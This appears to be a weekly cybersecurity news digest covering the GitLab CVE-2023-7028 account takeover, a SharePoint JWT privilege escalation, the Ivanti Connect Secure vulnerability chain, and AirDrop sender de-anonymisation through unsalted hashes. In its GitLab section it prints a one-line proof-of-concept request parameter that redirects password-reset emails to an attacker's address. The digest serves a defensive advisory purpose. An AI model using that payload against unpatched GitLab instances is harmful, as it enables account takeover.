CCTR.3.JAN.24

Gitlab Bugs, SharePoint bugs, Ivanti

Monday morning Cyber coffee read CCTR.3.JAN.24.

All your Gits belong to someone else.

If you’re running self-managed Gitlab you might want to consider patching for CVE-2023-7028 (CVSS 10). This vulnerability allows user account password reset emails to be delivered to an unverified email address, leading to account takeover unless 2FA is enabled using this simple PoC

user[email][]=validemail&user[email][]=attackeremail

Following version are affected by this vulnerability

  • 16.1 to 16.1.5

  • 16.2 to 16.2.8

  • 16.3 to 16.3.6

  • 16.4 to 16.4.4

  • 16.5 to 16.5.5

  • 16.6 to 16.6.3

  • 16.7 to 16.7.1

Ref https://twitter.com/Dinosn/status/1745787096042807356

Ref https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/

Escalation SharePoint

CISA has added CVE-2023-29357 (CVSS 9.8) SharePoint Server Privilege Escalation Vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. This allows a threat actor to use fake JWT tokens to bypass authentication and gain administrator privileges. If you're interested in learning more about JWT you should check this out from PentesterLab.

https://www.linkedin.com/posts/pentesterlab_jwt-none-algorithm-activity-7152056195535503360-KL4X/

Ref https://www.cisa.gov/news-events/alerts/2024/01/10/cisa-adds-one-known-exploited-vulnerability-catalog

https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-vulnerabilities-ivanti-connect-secure-ics-and-ivanti-policy-secure-ips

Ivanti Connect "Not" Secure

ACSC urges organisations who are running or administering instances of Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) to patch them. Ivanti ICS, formerly known as Pulse Connect Secure and Ivanti IPS gateways contain an authentication bypass vulnerability CVE-2023-46805 (CVSS 8.2) in the web component that allows an attacker to access restricted resources by bypassing control checks. This vulnerability can be leveraged in conjunction with CVE-2024-21887 (CVSS 9.1), a command injection vulnerability. Ivanti is aware of active exploitation of these vulnerabilities.

Ref https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-vulnerabilities-ivanti-connect-secure-ics-and-ivanti-policy-secure-ips

Ref https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

China Vs AirDrop

China hacking / cracking AirDrop? Nah. A more accurate description would be a decrease in the problem space through rainbow tables. Airdrop doesn’t use cryptographic salts. As a result, the SHA256 hashes of all potential phone numbers for a specific country can be easily computed into a relatively small rainbow table, typically just a few terabytes in size. Afterward, it's simply a matter of looking up the hash to uncover the original sender's identity. Currently, there is no effective method to prevent the leakage of your phone number and email address through Airdrop.

Ref https://twitter.com/lauriewired/status/1745871465592094970

Ref https://www.scmp.com/news/china/politics/article/3247771/china-forensic-firm-cracks-apples-airdrop-help-beijing-police-track-senders

PreviousCCTR.4.JAN.24NextCCTR.2.JAN.24

Last updated